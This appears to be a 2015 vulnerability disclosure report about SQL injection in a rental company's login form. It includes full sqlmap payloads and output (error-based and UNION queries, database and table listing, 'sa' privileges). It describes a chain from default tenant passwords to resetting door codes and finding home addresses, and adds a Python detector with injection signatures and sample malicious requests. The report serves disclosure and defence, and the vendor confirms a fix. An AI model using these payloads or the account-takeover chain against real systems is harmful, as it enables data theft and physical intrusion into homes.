2015-11-06: Details sent to the vendor; awaiting the vendor's handling
2015-11-06: Vendor confirmed; details disclosed to the vendor only
2015-11-16: Details disclosed to core white-hats and experts in the relevant field
2015-11-26: Details disclosed to ordinary white-hats
2015-12-06: Details disclosed to intern white-hats
2015-12-21: Details disclosed to the public
One day I saw a WeChat post from a Qingke sales rep advertising an online door-opening service. Qingke's door-opening service is impossible to guard against! Once again I feel that the place I live in has no door! No door! No door! I asked a former Qingke employee, and the main-gate password is the same for an entire district...
Site
http://km.qk365.com/
POST injection
sqlmap identified the following injection points with a total of 932 HTTP(s) requests:
---
Place: POST
Parameter: txt_Password
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNzkyODY2ODA2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKaW1hZ2VGaWVsZGAUS7Bo2b rTX22oGpB3az Q5MK&txt_Code=1111&txt_Password=111111' AND 4655=CONVERT(INT,(CHAR(58) CHAR(122) CHAR(117) CHAR(116) CHAR(58) (SELECT (CASE WHEN (4655=4655) THEN CHAR(49)ELSE CHAR(48) END)) CHAR(58) CHAR(110) CHAR(120) CHAR(119) CHAR(58))) AND 'gGri'='gGri&imageField.x=22&imageField.y=15&__EVENTVALIDATION=/wEWBALXrurxCALLm6aZAgLS9cL8AgKrg9HsD/6wTuGPHEaKThJjkc8fmNFk3e R
    Vector: AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNzkyODY2ODA2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKaW1hZ2VGaWVsZGAUS7Bo2b rTX22oGpB3az Q5MK&txt_Code=1111&txt_Password=111111' UNION ALL SELECT CHAR(58) CHAR(122) CHAR(117) CHAR(116) CHAR(58) CHAR(105) CHAR(106) CHAR(110) CHAR(118) CHAR(69) CHAR(122) CHAR(78) CHAR(109) CHAR(72) CHAR(118) CHAR(58) CHAR(110) CHAR(120) CHAR(119) CHAR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &imageField.x=22&imageField.y=15&__EVENTVALIDATION=/wEWBALXrurxCALLm6aZAgLS9cL8AgKrg9HsD/6wTuGPHEaKThJjkc8fmNFk3e R
    Vector: UNION ALL SELECT [QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

Place: POST
Parameter: txt_Code
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNzkyODY2ODA2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKaW1hZ2VGaWVsZGAUS7Bo2b rTX22oGpB3az Q5MK&txt_Code=1111' AND 9345=CONVERT(INT,(CHAR(58) CHAR(122) CHAR(117) CHAR(116) CHAR(58) (SELECT (CASE WHEN (9345=9345) THEN CHAR(49) ELSE CHAR(48) END))CHAR(58) CHAR(110) CHAR(120) CHAR(119) CHAR(58))) AND 'yTLA'='yTLA&txt_Password=111111&imageField.x=22&imageField.y=15&__EVENTVALIDATION=/wEWBALXrurxCALLm6aZAgLS9cL8AgKrg9HsD/6wTuGPHEaKThJjkc8fmNFk3e R
    Vector: AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNzkyODY2ODA2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKaW1hZ2VGaWVsZGAUS7Bo2b rTX22oGpB3az Q5MK&txt_Code=1111' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(58) CHAR(122) CHAR(117) CHAR(116) CHAR(58) CHAR(111) CHAR(101)CHAR(118) CHAR(67) CHAR(113) CHAR(117) CHAR(78) CHAR(109) CHAR(119) CHAR(113) CHAR(58) CHAR(110) CHAR(120) CHAR(119) CHAR(58),NULL,NULL,NULL,NULL,NULL,NULL-- &txt_Password=111111&imageField.x=22&imageField.y=15&__EVENTVALIDATION=/wEWBALXrurxCALLm6aZAgLS9cL8AgKrg9HsD/6wTuGPHEaKThJjkc8fmNFk3e R
    Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL--
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: txt_Code, type: Single quoted string (default)
[1] place: POST, parameter: txt_Password, type: Single quoted string
[q] Quit
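The sqlmap output above shows the two techniques that worked against the login form: MSSQL error-based injection (CONVERT(INT, ...) forcing a conversion error that carries the query result) and a 17-column UNION query. The following is an added example, not code from the original report or from Qingke: a small detector that scans POST bodies from a web-server log for those exact signatures on the two injected parameters. The parameter names txt_Code and txt_Password come from the page; the sample bodies are constructed for the example.

```python
import re
from urllib.parse import parse_qs

# Form fields that reach the back-end SQL on the login page (names from the report).
WATCHED_PARAMS = ("txt_Code", "txt_Password")

# Signatures of the two techniques sqlmap reported: MSSQL error-based CONVERT(INT, ...),
# UNION ALL SELECT padded with NULLs, and the CHAR(n) string-building both payloads use.
SIGNATURES = {
    "mssql_error_based": re.compile(r"CONVERT\s*\(\s*INT\s*,", re.I),
    "union_select": re.compile(r"\bUNION\s+ALL\s+SELECT\b", re.I),
    "char_concat": re.compile(r"(?:\bCHAR\s*\(\s*\d+\s*\)\s*[+ ]?\s*){2,}", re.I),
}

# Constructed sample POST bodies (not real traffic), modelled on the request shape above.
SAMPLE_POST_BODIES = [
    "txt_Code=1111&txt_Password=111111&imageField.x=22&imageField.y=15",
    "txt_Code=1111&txt_Password=111111' AND 4655=CONVERT(INT,(CHAR(58)+CHAR(122)+"
    "(SELECT (CASE WHEN (4655=4655) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58))) "
    "AND 'gGri'='gGri&imageField.x=22&imageField.y=15",
    "txt_Code=1111' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,"
    "CHAR(58)+CHAR(122),NULL,NULL,NULL,NULL,NULL,NULL-- &txt_Password=111111",
    "txt_Code=O'Brien&txt_Password=secret",  # a lone apostrophe alone is not a hit
]

def scan_body(body):
    """Return {param: [matched signature names]} for watched params in one POST body."""
    hits = {}
    fields = parse_qs(body, keep_blank_values=True)  # decodes '+' to a space
    for name in WATCHED_PARAMS:
        for value in fields.get(name, []):
            matched = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
            if matched:
                hits[name] = matched
    return hits

def scan_log(bodies):
    """Scan a sequence of POST bodies; return (line index, hits) for suspicious ones."""
    return [(i, h) for i, body in enumerate(bodies) if (h := scan_body(body))]

if __name__ == "__main__":
    for index, hits in scan_log(SAMPLE_POST_BODIES):
        print(f"line {index}: {hits}")
```

A burst of such hits from one client (sqlmap needed 932 requests here) is the second signal to alert on, alongside the per-request signatures.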
Databases retrieved
available databases [27]:
[*] 20141231
[*] master
[*] model
[*] msdb
[*] new_0430
[*] new_HouseRent
[*] new_HouseRent_20141130
[*] new_HouseRent_20141201
[*] new_HouseRent_20141228
[*] new_HouseRent_20150119
[*] new_HouseRent_20150120
[*] new_HouseRent_20150205
[*] new_HouseRent_20150301
[*] new_HouseRent_20150306
[*] new_HouseRent_20150325
[*] new_HouseRent_20150401
[*] new_HouseRent_20150405
[*] new_HouseRent_20150501_0
[*] new_HouseRent_20150605
[*] new_HouseRent_20150731
[*] new_HouseRent_20150930
[*] ReportServer
[*] tempdb
[*] tmp_1018
[*] tmp_1019
[*] tmp_1020
[*] tmp_111
Current user, current database and privileges
current user: 'sa'
current database: 'new_HouseRent'
Tables in the current database
The user table is
Customer_Tenant
Check the row count
sqlmap reads the first user's record; the log shows the following
Log in directly with this user's account (the national ID number) and password (the default password is the last 6 digits of the ID number). After logging in, the door password can be reset here
Combined with the personal-account site, this pinpoints the physical address (the residential address)
http://m.qk365.com/
The account and password are shared across the two sites, so the same credentials log in directly; the URL below contains the user's residential address. http://m.qk365.com/admin/contract/stayAgreement.jsp
With the door password and the detailed residential address together, getting past the main gate is all it takes to enter the room. (Then I shamelessly asked again: the main-gate password really is shared across an entire district!!)
The place I live in has no door! The place I live in has no door! The place I live in has no door! OK, enough joking. I actually found this vulnerability long ago; at first it was a universal password on the OA system that I never submitted. Yesterday I saw someone else submit it, so I hurried to report this one. Check for unauthorized users, check for webshells, and rule out backdoors~
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-11-06 18:59
Many thanks; an emergency fix has been scheduled
None